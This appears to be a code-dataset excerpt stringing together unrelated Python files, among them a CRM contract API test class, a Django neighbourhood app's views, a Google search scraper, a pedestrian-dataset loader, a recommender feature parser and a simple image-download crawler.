- T.mean(T.neq(_predict,self.y))\n self.precision = theano.function(\n inputs=[self.x,self.y],\n outputs=_precision,\n allow_input_downcast=True\n )\n\n\ndef sgd_optimization(lr=1,n_epochs=100,filemane='data.pkl',batch_size=1,n_input=2,n_hidden=2,n_output=2):\n\n train_x=np.array([[1,2],\n [4,5]])\n train_y =np.array([0,0])\n print('...building the model')\n classifier = LSTMlayer(\n n_input=n_input,\n n_hidden=n_hidden,\n n_output=n_output\n )\n updates = [\n (params,params-lr*gparams)for params,gparams in zip(classifier.params,classifier.gparams)\n ]\n train_model = theano.function(\n inputs=[classifier.x,classifier.y],\n outputs=classifier._negative_log_likelihood,\n updates = updates,\n allow_input_downcast=True\n )\n\n epoche=0\n while epoche\",str(soup))\n # scopes = re.findall(r\"hetongs\\?scope=(.*?)\\\">\", str(soup))\n return scopes\n\n def contract(self, contract_id):\n # soup = self.get_contract(contract_id)\n # self.contracts_revisit_logs(soup, contract_id)\n self.get_contract_detail(contract_id)\n self.get_expenses(contract_id)\n self.get_events(contract_id)\n self.get_attachment(contract_id)\n self.get_operation_logs(contract_id)\n # self.get_contract(contract_id)\n # self.export_selected_contracts(scope)\n # self.export_all_contracts(scope)\n # self.contracts_revisit_logs(soup, contract_id)\n self.get_contract_detail(contract_id)\n self.get_invoiced_payments_tab(contract_id)\n self.contract_add_received_payments(contract_id)\n self.get_received_payments_tab(contract_id)\n self.get_tab_products(contract_id)\n self.get_attachment(contract_id)\n self.get_events(contract_id)\n self.get_operation_logs(contract_id)\n\n\n #获取合同ID\n def contract_ids(self):\n url = self.base_url + 'contracts'\n body = {\n 'order':'asc',\n 'scope':'all_own',\n 'sort': 'contracts.updated_at desc',\n 'per_page':10,\n 'type':'advance',\n 'section_only':'true'\n }\n response = self.common.get_response_json(url, body, '获取当前页的合同')\n if not response:\n return {}\n self.response = 
response\n S = self.response.content\n #print S\n soup = BeautifulSoup(S, \"html.parser\")\n checked_contract = soup.find(attrs={'data-entity-table-name':'contract'})\n if checked_contract:\n a = str(checked_contract)\n contract_id_list = re.findall(r\"data-id=\\\"(.*?)\\\">\",a)\n return contract_id_list\n\n #导出所选合同\n def export_selected_contracts(self, scope):\n contract_ids = self.contract_ids()\n url = self.base_url + 'contracts?export_page=1&format_type=calculate_export_pages&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance&selected_ids%5B%5D='+contract_ids[0]+'&selected_ids%5B%5D='+contract_ids[1]+'&format=js'\n self.common_get_resonse_json(url, 'export_selected_contracts')\n url = self.base_url + 'contracts.js?export_page=1&format_type=xlsx&order=asc&per_page=10&scope='+scope+'&selected_ids%5B%5D='+contract_ids[0]+'&selected_ids%5B%5D='+contract_ids[1]+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export selected file')\n #导出全部合同\n def export_all_contracts(self, scope):\n url = self.base_url + 'contracts?format_type=calculate_export_pages&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'export_all_contracts')\n\n #点击下载文档\n url = self.base_url + 'contracts?export_page=1&format_type=xlsx&order=asc&per_page=10&scope='+scope+'&sort=contracts.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export all contract file')\n\n #获取单个合同详情\n def get_contract(self, contract_id):\n print(contract_id)\n url = self.base_url + 'contracts/'+ str(contract_id)\n body = {}\n response = self.common.get_response_json(url, body, '获取当前用户详情')\n if response !='False':\n soup = BeautifulSoup(response.content, 'html.parser')\n return soup\n #\n url = self.base_url + 'contracts/'+ str(contract_id) + '?tab=tab_base'\n params = {\n 'tab': 'tab_base'\n }\n self.common.get_response_json(url, params, 
'合同的基本资料')\n\n\n #合同写跟进\n def contracts_revisit_logs(self, soup, contract_id):\n status_list = re.findall(r\"data-status=\\\"(.*?)\\\">\",str(soup))\n if status_list:\n for status in status_list:\n url = self.base_url + 'api/contracts/%s/revisit_logs' %contract_id\n body = {\n 'utf8':'✓',\n 'authenticity_token': self.csrf,\n 'revisit_log[category]':'91160',\n 'revisit_log[real_revisit_at]':self.common.get_today_str_yymmddhhmm(),\n 'revisit_log[content]':'写跟进%s' %self.common.get_random_int(9999),\n 'revisit_log[loggable_attributes][status]':status,\n 'revisit_log[loggable_attributes][id]':contract_id,\n 'revisit_log[remind_at]':self.common.get_tomorrow_srt_yymmddhhmm()\n }\n response = self.common.post_response_json(url, body, '合同写跟进')\n if not response:\n return {}\n\n #查看合同资料\n def get_contract_detail(self, contract_id):\n url = self.base_url + 'contracts/'+ str(contract_id)\n params = {\n 'only_base_info': 'true'\n }\n self.common.get_response_json(url, params, '获取合同的详细资料')\n\n # 合同获取回款记录tab\n def get_received_payments_tab(self, contract_id):\n # url = self.base_url + str(contract_id) +'?tab=tab_received_payments'\n url = self.base_url +'api/received_payments?page=&perPage=15&contract_id=' + str(contract_id)\n params ={\n 'tab': 'tab_received_payments'\n }\n self.common.get_response_json(url, params, '获取合同详情的回款tab页')\n\n #合同详情页新增回款计划\n def add_received_payment_plans(self,contract_id):\n url = self.base_url + 'contracts/'+ str(contract_id)+'?tab=tab_received_payments'\n params ={\n 'tab': 'tab_received_payments'\n }\n url = self.base_url +'api/received_payment_plans/batch_create?contract_id='+ str(contract_id)\n body = {\n 'utf8': ' ✓',\n 'authenticity_token': self.csrf,\n 'plans[0][customer_id]': self.testAddCustomer.add_customers(),\n 'plans[0][contract_id]': self.testAddContract.add_contracts(),\n 'plans[0][receive_stage]': '1',\n 'plans[0][receive_date]': '2018-08-01',\n 'plans[0][amount]': '5000',\n 'plans[0][note]':'',\n 'plans[1][customer_id]': 
self.testAddCustomer.add_customers(),\n 'plans[1][contract_id]': self.testAddContract.add_contracts(),\n 'plans[1][receive_stage]': '1',\n 'plans[1][receive_date]': '2018-08-01',\n 'plans[1][amount]': '6000',\n 'plans[1][note]': ''\n }\n response = self.common.post_response_json(url, body, '新增回款计划 api是' + url)\n if not response:\n return {}\n self.response = response\n received_payments_id = self.response.json()['data']['id']\n return received_payments_id\n\n #合同详情页新增回款记录\n def contract_add_received_payments(self, contract_id):\n url = self.base_url +'/contracts/' +str(contract_id) + '/received_payments'\n body ={\n 'authenticity_token':self.csrf,\n\n 'contract_id': 30939,\n 'received_payment[receive_date]': '2018-06-22',\n 'received_payment[amount]': '2000',\n 'received_payment[customer_id]': self.customer_id,\n 'received_payment[contract_id]': self.contracts_id,\n 'received_payment[received_payment_plan_id]': '',\n 'received_payment[payment_type]':'',\n 'received_payment[received_types]':'',\n 'received_payment[receive_user_id]': self.user_id,\n 'received_payment[note]':'备注',\n }\n response = self.common.post_response_json(url, body, '合同详情页新增回款记录 api是'+url)\n if not response:\n return {}\n self.response = response\n received_payments_amount = self.response.json()['data']['amount']\n return received_payments_amount\n\n\n # 合同获取开票记录tab\n def get_invoiced_payments_tab(self, contract_id):\n url = self.base_url +'api/invoiced_payments?page=&perPage=15&contract_id=' + str(contract_id)\n params ={\n 'tab': 'tab_invoiced_payments'\n }\n self.common.get_response_json(url, params, '获取合同详情的开票tab页')\n\n #合同详情页新增开票记录\n def contract_add_invoiced_payments(self, contract_id):\n url = self.base_url +'/contracts/' +str(contract_id) + '/invoiced_payments'\n body ={\n 'authenticity_token':self.csrf,\n 'invoiced_payment[amount]': '2000',\n 'invoiced_payment[invoice_types]': '205671',\n 'invoiced_payment[invoice_no]':'',\n 'invoiced_payment[note]':'备注',\n 
'invoiced_payment[invoiced_date]': '2018-06-23',\n 'invoiced_payment[broker_user_id]': self.user_id,\n 'invoiced_payment[content]': '开票' %self.common.get_random_int(99999),\n }\n response = self.common.post_response_json(url, body, '合同详情页新增开票记录 api是'+url)\n if not response:\n return {}\n self.response = response\n invoiced_payment_amount = self.response.json()['data']['amount']\n return invoiced_payment_amount\n\n #查看合同关联的产品\n def get_tab_products(self,contract_id):\n url = self.base_url + 'api/product_assets?page=&perPage=15&assetable_id='+str(contract_id)+'&assetable_type=Contract'\n print(url)\n params = {\n 'tab': 'tab_products'\n }\n self.common.get_response_json(url, params, '获取合同详情的产品tab页')\n\n #查看合同的费用\n def get_expenses(self, contract_id):\n url = self.base_url + 'api/expenses?page=&perPage=100&contract_id='+str(contract_id)\n params = {\n 'page': '',\n 'perPage': 100,\n 'contract_id': contract_id\n }\n self.common.get_response_json(url, params, '获取当前合同的费用')\n\n #查看合同的任务\n def get_events(self, contract_id):\n url = self.base_url + 'events?entity_id='+str(contract_id)+'&entity_klass=Contract'\n params = {\n 'entity_id': contract_id,\n 'entity_klass': 'Contract'\n }\n self.common.get_response_json(url, params, '获取当前合同的任务')\n\n #查看合同下的附件\n def get_attachment(self, contract_id):\n url = self.base_url + 'api/attachments?page=&perPage=15&entity_id='+str(contract_id)+'&klass=Contract&sub_type=file'\n params = {\n 'page':'',\n 'perPage':15,\n 'entity_id':contract_id,\n 'klass':'Contract'\n }\n self.common.get_response_json(url, params, '获取当前合同的附件')\n\n #查看合同的操作日志\n def get_operation_logs(self, contract_id):\n url = self.base_url + 'api/operation_logs?page=&perPage=15&loggable_id='+str(contract_id)+'&loggable_type=Contract'\n params = {\n 'page':'',\n 'perPage':15,\n 'loggable_id':contract_id,\n 'loggable_type':'Contract'\n }\n self.common.get_response_json(url, params, '查看合同的操作日志')\n\n #返回到合同详情(基本信息tab)\n def get_contracts_tab_base(self,contract_id):\n url = 
self.base_url + 'contracts/'+ str(contract_id) + '?tab=tab_base'\n params = {\n 'tab': 'tab_base'\n }\n self.common.get_response_json(url, params, '切换回合同的基本资料')\n","sub_path":"testCase/contracts/testGetContract.py","file_name":"testGetContract.py","file_ext":"py","file_size_in_byte":13931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"155738358","text":"from collections import Counter\n\ndef load_data(filepath):\n with open(filepath) as f:\n lines = f.readlines()\n text_list = list(map(lambda s: s.strip(), lines))\n text = ''.join(text_list)\n cleaned_text = ''.join([i for i in text if i.isalpha() or i.isspace()])\n return cleaned_text\n\n\ndef get_most_frequent_words(text):\n frequencies = Counter()\n frequencies.update(text.upper().split())\n return frequencies.most_common(10)\n\n\nif __name__ == '__main__':\n filepath = '/Users/kr/PycharmProjects/tceh/gg.txt'\n print(get_most_frequent_words(load_data(filepath)))\n","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"54436294","text":"import pygame\n\nclass UI_Select(object):\n\n\tdef __init__(self, uid, game, loc, size, labels):\n\t\n\t\tself.uid = uid\n\t\tself.game = game\n\t\t\n\t\tself.value = 0\n\t\tself.visible = False\n\t\tself._returned = 0\n\n\t\tself.x, self.y = loc\n\t\tself.labels = labels\n\t\tself.back = pygame.Surface(size).convert_alpha()\n\t\tself.back.fill((0,0,0,127))\n\t\t\n\tdef start(self):\n\t\n\t\tself.visible = True\n\t\tself.value = 0\n\t\tself._returned = 0\n\t\tself.game.controller.flush()\n\t\n\tdef stop(self):\n\t\n\t\tself.visible = False\n\t\tself._returned = 1\n\t\tself.game.controller.flush()\n\t\n\t# each update needs to read the keystate of Engine\n\tdef update(self):\n\t\n\t\tself._returned = 0\n\t\n\t\tif self.visible:\n\t\t\ty_axis = 
self.game.controller.y_axis_sr\n\t\t\tbutton_a = self.game.controller.as_button\n\t\t\n\t\t\tif y_axis != 0:\t\t\t\n\t\t\t\tself.value = (self.value + y_axis) % len(self.labels)\n\t\t\t\t\n\t\t\tif button_a == 1:\n\t\t\t\tself.stop()\n\t\t\t\t#list(self.tDict.values())[self.value]()\n\t\t\t\t\n\tdef render(self):\n\t\n\t\tif self.visible:\n\t\t\tself.game.display.blit(self.back, (self.x, self.y))\n\t\t\t\t\n\t\t\tfor l, text in enumerate(self.labels): # self.tDict.keys()\n\t\t\t\tif l == self.value:\n\t\t\t\t\tlabel = text + \" <\"\n\t\t\t\telse:\n\t\t\t\t\tlabel = text\n\t\t\t\tx = self.x + 5 # padding\n\t\t\t\ty = self.y + 7 * (l+1) + l * self.game.ui_font.get_height() # 0:15; 1:40; 2:65\n\t\t\t\tlabel_image = self.game.ui_font.render(label, 0, (0xff,0xff,0xff))\n\t\t\t\tself.game.display.blit(label_image, (x,y))\n","sub_path":"api/graphics/uiselect.py","file_name":"uiselect.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147875140","text":"# Importing needed library\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nimport pickle\nimport pandas as pd\n\n# Setting global var\nDB = SQLAlchemy()\n\n# User input class sets up database tabel\nclass User_input(DB.Model):\n id = DB.Column(DB.Integer, primary_key=True)\n prediction = DB.Column(DB.Integer, nullable=False) # Will have ot change once I now the prediction format\n\n # Returns predictions as string\n def __repr__(self):\n return '{}'.format(self.prediction)\n\n\n# Predictor class loads in pickled model, predicts recommandations with predict method\nclass Predictor():\n def __init__(self):\n try:\n print('Loading models from expected local directory')\n self.nn = pickle.load(open('./strain-api/Models/nn.pkl','rb'))\n self.tfidf = pickle.load(open('./strain-api/Models/tfidf.pkl','rb'))\n print('Loaded Successfully')\n except Exception as e:\n print(e)\n print('Trying to load with OS Library')\n self.nn = 
pickle.load(open(os.getcwd()+'./strain-api/Models/nn.pkl','rb'))\n self.tfidf = pickle.load(open(os.getcwd()+'./strain-api/Models/tfidf.pkl','rb'))\n print('Loaded Successfully')\n\n # when called predicts recommendations given string input\n def predict(self, input_text, output_size):\n tokens = self.tfidf.transform([input_text]).todense()\n return self.nn.kneighbors(tokens, n_neighbors=output_size)[1][0]\n","sub_path":"strain-api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"595118040","text":"import unittest\nfrom unittest import mock\nfrom Exemples.app import OpenFoodFactsAPI\n\n\nclass Personne:\n def __init__(self):\n pass\n\n def donner_nom_personne(self, matricule):\n pass\n # return f'Toto, matricule {matricule}'\n\n\nclass MyTestCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n print(\"setup\")\n\n\n\n def test_magicMock_returvalue(self):\n lnf = Personne()\n mock_2 = mock.MagicMock(return_value=\"moooook\")\n lnf.donner_nom_personne = mock_2() # Création d'un mock sur la méthode \"donner_nom_personne\"\n val_ret = lnf.donner_nom_personne # retourne \"moooook\"\n self.assertEqual(lnf.donner_nom_personne, \"moooook\") # S'assurer que la méthode retourne bien \"moooook\"\n\n def test_count_product_numb(self):\n\n api_response = {\n \"count\": 6,\n \"skip\": 0,\n \"page_size\": \"150\",\n \"page\": 1,\n \"products\": [\n {\n \"product_name_fr\": \"Ferrero boite de 30\",\n \"nutrition_grade_fr\": \"a\",\n },\n {\n \"product_name_fr\": \"Ferrero Light sans sucre et sans goût\",\n \"nutrition_grade_fr\": \"b\",\n },\n {\n \"product_name_fr\": \"Ferrero Rocher\",\n \"nutrition_grade_fr\": \"e\",\n },\n {\n \"product_name_fr\": \"Ferrero couscous\",\n \"nutrition_grade_fr\": \"a\",\n },\n {\n \"product_name_fr\": \"Ferrero chocolat praliné\",\n \"nutrition_grade_fr\": \"d\",\n },\n {\n \"product_name_fr\": 
\"Ferrero à la fraise\",\n \"nutrition_grade_fr\": \"c\",\n },\n ]\n }\n\n healthy_product = OpenFoodFactsAPI()\n healthy_product._get_product_from_api = mock.Mock()\n healthy_product._get_product_from_api.return_value = api_response\n\n self.assertEqual(healthy_product.count_product_numb(\"ferrero\"), 2)\n\n @classmethod\n def tearDownClass(cls) -> None:\n print(\"teardown\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Exemples/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55736089","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\nfrom .forms import *\n\n\n@login_required(login_url='login')\ndef index(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n post.save()\n else:\n form = PostForm()\n\n try:\n hoods = Neighbourhood.objects.all()\n profiles = Profile.objects.all()\n biz = Business.objects.all()\n emergencies = EmergencyContact.objects.all()\n posts = Post.objects.all()\n\n index_data = {\n 'hoods': hoods,\n 'profiles': profiles,\n 'businesses': biz,\n 'emergencies': emergencies,\n 'posts': posts,\n 'form': form,\n }\n\n except Neighbourhood.DoesNotExist:\n posts = None\n hoods = None\n profiles = None\n biz = None\n emergencies = None\n return render(request, 'main/index.html', index_data)\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=password)\n login(request, user)\n return redirect('index')\n else:\n form = SignupForm()\n return render(request, 
'registration/signup.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_post(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.hood = request.user.profile.estate\n post.owner = request.user\n post.save()\n else:\n form = PostForm()\n return render(request, 'model_temp/add_posts.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_hood(request):\n if request.method == 'POST':\n form = NeighbourhoodForm(request.POST, request.FILES)\n if form.is_valid():\n hood = form.save(commit=False)\n hood.save()\n else:\n form = NeighbourhoodForm\n return render(request, 'model_temp/add_hoods.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_business(request):\n if request.method == 'POST':\n form = BusinessForm(request.POST, request.FILES)\n if form.is_valid():\n biz = form.save(commit=False)\n biz.save()\n else:\n form = BusinessForm\n return render(request, 'model_temp/add_biz.html', {'form': form})\n\n\n@login_required(login_url='login')\ndef create_emergency(request):\n if request.method == 'POST':\n form = EmergencyForm(request.POST, request.FILES)\n if form.is_valid():\n emergency = form.save(commit=False)\n emergency.save()\n else:\n form = EmergencyForm\n return render(request, 'model_temp/add_emergency.html', {'form': form})\n\n\ndef about(request):\n name = 'vick'\n return render(request, 'main/about.html', {'name': name})\n\n\ndef profile(request, username):\n return render(request, 'main/profile.html')\n\n\ndef edit_profile(request, username):\n user = User.objects.get(username=username)\n if request.method == 'POST':\n form = UpdateProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if form.is_valid():\n form.save()\n return redirect('profile', user.username)\n else:\n form = UpdateProfileForm(instance=request.user.profile)\n return render(request, 'editing/edit_profile.html', {'form': 
form})\n\n\ndef search_results(request):\n if 'search' in request.GET and request.GET['search']:\n search_term = request.GET.get('search')\n print(search_term)\n searched_photos = Neighbourhood.search_by_title(search_term)\n print(searched_photos)\n message = f'{search_term}'\n params = {\n 'searched_photos': searched_photos,\n 'message': message,\n }\n\n return render(request, 'search_results.html', params)\n\n else:\n message = 'Ooppss, You did not search for anything.'\n return render(request, 'main/search_results.html', locals())\n","sub_path":"watch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"167594554","text":"from django.urls import path, include\nfrom . import views\n\n\nurlpatterns = [\n path('recognitionRequest', views.recognitionRequestHandler, name='recognize'),\n path('requestInfo', views.requestInfo, name='test'),\n path('requestLoginInfo', views.requestLoginInfo, name='requestLoginInfo'),\n path('userUpdate', views.requestUpdateUserInfo, name='userUpdate'),\n]","sub_path":"src/server/backendServer/requestHandler/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185410204","text":"#!/usr/bin/python3\n#coding: utf-8\n\n'''\npython3 \n\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport getopt\n\nurl1 = 'http://www.chongbuluo.com/cngoogle.html'\n\nurl2 = 'http://www.chongbuluo.com/google.html'\n\npub = '?hl=zh-CN&gws_rd=cr&q='\n\n\ndef get_google_url(url = url2): \n try:\n response = requests.get(url)\n text = response.text\n soup = BeautifulSoup(text, 'html.parser')\n google_url = soup.find(id = 'form1').get('action')\n return(google_url)\n except Exception as err:\n print(err)\n\ndef google_search(q, url_ = url2, pagen = 3):\n\n u1 = get_google_url(url_)\n for i in 
range(1, pagen + 1):\n try:\n url = u1 + pub + q + '&start=' + str((i - 1) * 10)\n response = requests.get(url)\n text = response.text\n soup = BeautifulSoup(text, 'html.parser')\n all_url = soup.find_all('cite')\n for u in all_url:\n u_ = u.get_text()\n if u_[:4] != 'http' :\n print('http://' + u_)\n else:\n print(u_)\n except Exception as err:\n print(err) \n sys.exit(1)\n \ndef Usage():\n print('Usage: ')\n print(' get google url : -u --url')\n print(' google search : -s --search')\n print('Example:') \n print(' ./google_search.py -u') \n print(' ./google_search.py -s python') \n \nif __name__ == '__main__':\n \n if not sys.argv[1:]:\n Usage()\n sys.exit(1)\n \n try:\n opts, args = getopt.getopt(sys.argv[1:], 'us:', ['url', 'search='])\n except getopt.GetoptError as err:\n print(err)\n Usage()\n sys.exit(2)\n \n for o, a in opts:\n if o in ('-u', '--url'):\n print(get_google_url(url1))\n print(get_google_url(url2))\n elif o in ('-s', '--search'):\n google_search(a, pagen = 3) # 修改参数可以改变返回的链接的数量,参数为搜索的页数\n \n ","sub_path":"Python Scripts/google_search.py","file_name":"google_search.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343820698","text":"from StarsDatasets import StarsDatasets\nimport os\nimport re\nimport fnmatch\n\n\nclass tudbrussels(StarsDatasets):\n def __init__(self, base_path):\n super(tudbrussels, self).__init__('TUD-Brussels Pedestrian', base_path, '*.png')\n self._annotations = {}\n self.populate_dict()\n\n def populate_dict(self):\n idlfiles = []\n for root, dirnames, filenames in os.walk(self._base_path):\n for filename in fnmatch.filter(filenames, '*.idl'):\n idlfiles.append(os.path.join(root, filename))\n\n noann_regex = re.compile('\"(.+)\"[;.]')\n name_regex = re.compile('\"(.+)\":')\n tud_regex = re.compile('(\\d+),\\s+(\\d+),\\s+(\\d+),\\s+(\\d+)')\n self._obj_dict['pedestrian'] = []\n self._obj_dict['non-pedestrian'] = []\n for idl in 
idlfiles:\n fid = open(idl, 'r')\n idlpath = os.path.dirname(idl)\n for line in fid:\n line = line.strip()\n if re.match(noann_regex, line):\n name = map(str, re.findall(noann_regex, line))[0]\n fname = os.path.join(idlpath, name)\n self._obj_dict['non-pedestrian'].append(fname)\n else:\n name = map(str, re.findall(name_regex, line))[0]\n fname = os.path.join(idlpath, name)\n annotations = re.findall(tud_regex, line)\n annotations = map(lambda x: tuple(map(int, list(x))), annotations)\n self._annotations[fname] = annotations\n self._obj_dict['pedestrian'].append(fname)\n return None\n\n def get_data(self, file_list, object_list=None):\n annotations = {}\n fid = open(file_list, 'r')\n print('For TUD-Brussels any file for which annotations are not available will not be processed. No error will'\n 'be displayed.')\n for line in fid:\n line = line.strip()\n if line in self._obj_dict['pedestrian']:\n annotations[line] = self._annotations[line]\n return annotations\n\n def read_annotation(self, annotation_file):\n return NotImplemented\n\n\n","sub_path":"StarsDatasets/pedestrian/tudbrussels.py","file_name":"tudbrussels.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"400704757","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport gc\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings('ignore')\n\nclass DataParse:\n def __init__(self, category_feature, continuous_feature, ignore_feature=[], feature_dict={}, feature_size=0,\n field_size=0):\n self.feature_dict = feature_dict\n self.feature_size = feature_size\n self.field_size = field_size\n self.ignore_feature = ignore_feature\n self.category_feature = category_feature\n self.continuous_feature = continuous_feature\n\n def FeatureDictionary(self, train, test):\n '''\n 目的是给每一个特征维度都进行编号。\n 1. 对于离散特征,one-hot之后每一列都是一个新的特征维度(计算编号时,不算0)。所以,原来的一维度对应的是很多维度,编号也是不同的。\n 2. 
对于连续特征,原来的一维特征依旧是一维特征。\n 返回一个feat_dict,用于根据原特征名称和特征取值 快速查询出 对应的特征编号。\n train: 原始训练集\n test: 原始测试集\n continuous_feature: 所有数值型特征\n ignore_feature: 所有忽略的特征. 除了数值型和忽略的,剩下的全部认为是离散型\n feat_dict, feat_size\n 1. feat_size: one-hot之后总的特征维度。\n 2. feat_dict是一个{}, key是特征string的col_name, value可能是编号(int),可能也是一个字典。\n 如果原特征是连续特征: value就是int,表示对应的特征编号;\n 如果原特征是离散特征:value就是dict,里面是根据离散特征的 实际取值 查询 该维度的特征编号。 因为离散特征one-hot之后,一个取值就是一个维度,\n 而一个维度就对应一个编号。\n '''\n df = pd.concat([train, test], axis=0)\n feat_dict = {}\n total_cnt = 0\n\n for col in df.columns:\n # 连续特征只有一个编号\n if col in self.continuous_feature:\n feat_dict[col] = total_cnt\n total_cnt = total_cnt + 1\n\n # 离散特征,有多少个取值就有多少个编号\n elif col in self.category_feature:\n unique_vals = df[col].unique()\n unique_cnt = df[col].nunique()\n feat_dict[col] = dict(zip(unique_vals, range(total_cnt, total_cnt + unique_cnt)))\n total_cnt = total_cnt + unique_cnt\n\n self.feature_size = total_cnt\n self.feature_dict = feat_dict\n print('feat_dict=', feat_dict)\n print('=' * 20)\n print('feature_size=', total_cnt)\n\n def parse(self, df):\n '''\n 获得list形式的特征下标和特征值\n dfi的每一行代表一个样本各特征对应的编号,0,1,2,3,...\n dfv的每一行代表一个样本各特征的取值,离散特征功能取值为1,连续特征取值不变\n '''\n dfi = df.copy()\n dfv = df.copy()\n for col in dfi.columns:\n if col in self.ignore_feature:\n dfi.drop([col], axis=1, inplace=True)\n dfv.drop([col], axis=1, inplace=True)\n\n elif col in self.continuous_feature: # 连续特征1个维度,对应1个编号,这个编号是一个定值\n dfi[col] = self.feature_dict[col]\n\n elif col in self.category_feature: # 离散特征。不同取值对应不同的特征维度,编号也是不同的。\n dfi[col] = dfi[col].map(self.feature_dict[col])\n dfv[col] = 1.0\n feature_index = dfi.values.tolist()\n feature_val = dfv.values.tolist()\n self.field_size = len(feature_index[0])\n del dfi, dfv\n gc.collect()\n\n return feature_index, feature_val\n\nif __name__ == '__main__':\n train = pd.read_csv('./data/train.csv')\n test = pd.read_csv('./data/test.csv')\n\n continuous_feature = ['age', 'fnlwgt', 'education_num', 'capital_gain', 'capital_loss', 
'hours_per_week']\n category_feature = ['workclass', 'education', 'marital_status', 'occupation', 'relationship', 'race', 'sex',\n 'native_country']\n dataParse = DataParse(continuous_feature=continuous_feature, category_feature=category_feature)\n dataParse.FeatureDictionary(train, test)\n feature_index, feature_val = dataParse.parse(train)\n print(feature_index[0], feature_val[0])\n","sub_path":"RecSys And Deep Learning/DNN/nfm/DataParse.py","file_name":"DataParse.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299633992","text":"import urllib\nimport re\nimport os\nfrom collections import deque\n\n\"\"\" 读取指定网页的源码 \"\"\"\n# url = \"http://www.baidu.com\"\n# data = urllib.request.urlopen(url).read()\n# data = data.decode('UTF-8')\n# print(data)\n\"\"\" 读取可变网页的源码 \"\"\"\n# data = {}\n# data['word'] = 'one peace'\n# url_values = urllib.parse.urlencode(data)\n# url = \"http://www.baidu.com/s?\"\n# full_url = url + url_values\n# a = urllib.request.urlopen(full_url)\n# data = a.read()\n# data = data.decode('UTF-8')\n# print(data)\n# ##打印出网址:\n# a.geturl()\n\n\n\"\"\" 简单爬虫-树形搜索 \"\"\"\ndef getImg(html):\n imgre = re.compile(r'\"(http.*?\\.jpg)\"', re.S) #re.compile() 可以把正则表达式编译成一个正则表达式对象.\n imglist = re.findall(imgre, html) #re.findall() 方法读取html 中包含 imgre(正则表达式)的 数据\n #把筛选的图片地址通过for循环遍历并保存到本地\n #核心是urllib.urlretrieve()方法,直接将远程数据下载到本地,图片通过x依次递增命名\n x = 0\n imgSet = set(imglist)\n\n for imgurl in imgSet:\n try:\n urllib.request.urlretrieve(imgurl, 'D:\\E\\%s.jpg' % x)\n x += 1\n except Exception as e:\n print(e)\n pass\n\n\n# 使用队列存放url\nqueue = deque()\n# 使用visited防止重复爬同一页面\nvisited = set()\n\n# data = {}\n# data['word'] = 'no panties'\n# data['tn'] = 'baiduimage'\n# url_values = urllib.parse.urlencode(data)\n# url = 'https://image.baidu.com/search/index?' 
